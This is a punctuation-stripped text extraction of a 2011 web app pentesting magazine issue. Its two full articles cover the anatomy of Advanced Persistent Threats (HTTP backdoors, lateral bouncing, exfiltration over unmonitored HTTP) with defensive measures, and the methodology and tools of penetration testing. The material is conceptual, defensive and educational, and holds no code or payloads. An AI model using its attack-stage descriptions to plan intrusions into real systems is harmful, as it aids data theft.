Web Appc Pen Testing 01 2011
Transcript of Web Appc Pen Testing 01 2011
a d v e r t i s e m e n t
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
ADVANCED PERSISTENT THREATSThe significance of HTTP and the Web for Advanced Persistent Threatsby Matthieu Estrade
The means used to achieve an APT are often substantial and proportional to the criticality of targeted data ndash note Matthieu Esterade Author claims that APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations Real-life experience of application management highlights difficulties in implementing all the good practices How important APT is you can find out reading the article
WEB APP SECURITYWeb Application Security and Penetration Testingby Bryan Soliman
Author shows the importance of Penetration Testing in Web Application Security Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase Automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications
Developers are form Wenus Application Security guys from Mars
by Paolo PeregoWe know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code Paolo Perego shows in his article how difficult the communication between this two groups is
WEB APP VULNERABILITIESPulling legs of Arachniby Herman Stevens
Herman Stevens shows us in-depth analysis of Arachni Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed
06
12
EDITORrsquoS NOTE
20
22
Web Application Security and VulnerabilitiesHave you ever wondered how important for IT security is the security of web applications
The brand new November issue of Web App Pentesting magazine will attempt to provide you some answers This new Web App Pentesting features information about Web Application Security and Vulnerabilities For the first time we would like to present the penetration testing topic from web applicationrsquos point of view We publish the articles about how important is Pentesting in WAS We gathered a very good articles from different sources to give you a deep insight into this matter
In November issue you will find a very good article on the Significance of HTTP Protocol and Web for Advanced Persitetnt Threats written by Matthieu Estrade He shows us the importance of APT attacks The article is exhaustive mini-guide to APT and how particular threats can be defined as APTrsquos On page 6 to find out more about the APT
Go to pages 12-21 to read the articles about WAS The first article is written by Bryan Soliman on Web Application Security and Penetration Testing He introduces you to nature of Pen testing for web applications I think that most of you will find this article very useful and informative overview of WAS Just read page 12
Web Application Vulnerabilities Two great articles covers important aspects of this metter I would like to introduce you Herman Stevens article Pulling legs of Arachni that specifies analysis of Arachni ndash web application vulnerability scanner More on page 22 Second worth of read article is XSS Beef Metaspoilt Exploitation written by Arvind Doraiswamy Author describers Cross Site Scripting with all practical aspects ndash page 30
All articles are very interesting and they need to be marked as Need to be Read As always
Thank the Beta Testers and Proofreaders for their excellent work and dedication to help make this magazine even better Special thanks to all authors that help me create this issue
I would like to mention some supporters this time and thank Jeff Weaver Daniel Wood Edward Wierzyn for their help and gorgeous ideas They work really hard to get magazine out for you to read I also would like to thank all of other helpers for their contribution to the magazine
The last but not least I would like to welcome Ryk Edelstain on our Advisory Board Ryk has over 30 years of experience in IT Security As he describes himself ldquoI have a profound understanding of technology and the practices behind penetration testing Although I work with others technical resources to handle the technical aspect of IT threat assessment my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies In fact the practice and processes I have learned in the TSCM practice parallels those of PT where the environment is assessed a strategy and process is defined and a documented and methodical process is executed Results are continually evaluated at each step and as the environment is learned the process is refined and executed until the assessment is completerdquo Ryk will help us to make PenTest more worth of reading
Enjoy reading new Web App PentestingKatarzyna Zwierowicz
amp Pentest team
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
TEAMEditor Katarzyna Zwierowicz katarzynazwierowiczsoftwarecompl
Betatesters Jeff Weaver Daniel Wood Edward Wierzyn Davide Quarta
Senior ConsultantPublisher Paweł Marciniak
CEO Ewa Dudzicewadudzicsoftwarecompl
Art Director Ireneusz Pogroszewski ireneuszpogroszewskisoftwarecomplDTP Ireneusz Pogroszewski
Production Director Andrzej Kuca andrzejkucasoftwarecompl
Marketing Director Ewa Dudzicewadudzicsoftwarecompl
Publisher Software Press Sp z oo SK02-682 Warszawa ul Bokserska 1Phone 1 917 338 3631wwwpentestmagcom
Whilst every effort has been made to ensure the high quality of the magazine the editors make no warranty express or implied concerning the results of content usageAll trade marks presented in the magazine were used only for informative purposes
All rights to trade marks presented in the magazine are reserved by the companies which own themTo create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathTypetrade
DISCLAIMERThe techniques described in our articles may only be used in private local networks The editors hold no responsibility for misuse of the presented techniques or consequent data loss
in Ruby by Tasos ldquoZapotekrdquo Laskos Step by step author acquaints us with process of instalation and using the programm Also shows us clearly the advantages and disadvantages of Arachni
XSS BeeF Metaspolit ExploitationBy Arvind Doraiswamy
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code In this article Arvind Doraiswamy shows us how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using BeeF
Cross-site request forgery In-depth analysis by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users Samvel Gevorgyan step by step describes how to proceed with CSRF vulnerability
WEB APPS CHECKINGFirst the Security Gate then the Airplaneby Olivier Wai
Olivier Wai is trying to give us the answer ldquoWhat needs to be heeded when checking web applicationsrdquo Any web application old or new needs to be secured by a Web Application Firewalls (WAFs) in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place Web Application Firewalls (WAFs) If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
CONTENTS
38
34
30
EDITORrsquoS NOTE
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The omnipresence of the Web is now a given and it serves a wide variety of situations as detailed n the non-exhaustive list below
bull Community applicationsbull Institutional Web sites bull Online transactionsbull Business applicationsbull IntranetExtranetbull Entertainmentbull Medical databull Etc
In response to user requirements and developing needs content driven by HTTP has become incre-asingly rich and dynamic It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms PC Mac and Mobile users all form part of the connected masses operating on their chosen platforms But have these new privileges arrived without any underlying constraints
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web A concrete example is the fact that HTTP does not provide native support for sessions and it is therefore
difficult to be sure that requests received during browsing emanate from the same user Large scale use of the Web illustrates the
discrepancy that exists in terms of security versus volume and this inherent flaw has become a major IT system issue making HTTP a preferred vector of attacks and data compromise
Cybercriminals are aware of the exploitability of the Web and have made it their number one target Not a week goes by without a an organization being compromised via HTTP
bull Playstation Network (Sony) -gt Wordpress version problem
bull MySQL (Oracle) -gt SQL Injectionbull RSA (EMC) -gt SQL Injectionbull TJX -gt SQL Injection
The above attacks conceived and carried out with precise attention to logistics are by no means an innovation but we now refer to them differently using the term APT Advanced Persistent Threat
Bolstered cyber-activity the discovery of intrusion and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage which in turn amplifies the impact on the image of the unfortunate victims that are more often than not high-profile businesses or international organizations
The SignificanceOf HTTP And The Web For Advanced Persistent
Threats
Initially created in 1989 by Tim Berners-Lee of the CERN Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 ndash a mere time lapse of twenty-two years in the transmission of Web-based content
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The use of HTTP may be required because different areas are often filtered out leaving only necessary protocols to emerge HTTP is often left open to allow administrators to navigate through these machines or to update them
To remain as stealthy as possible a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and or as a tunnel to other applications During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system
Bounce MechanismsWhenever changes occur witin an IT system the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessibleHTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas
bull Dialogue between server applicationsbull Web Servicesbull Web Administration Interfacebull Etc
It often happens that security policies contain the same weaknesses from one area to another
bull Exit ports openedbull Filtering omission on higher level portsbull Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
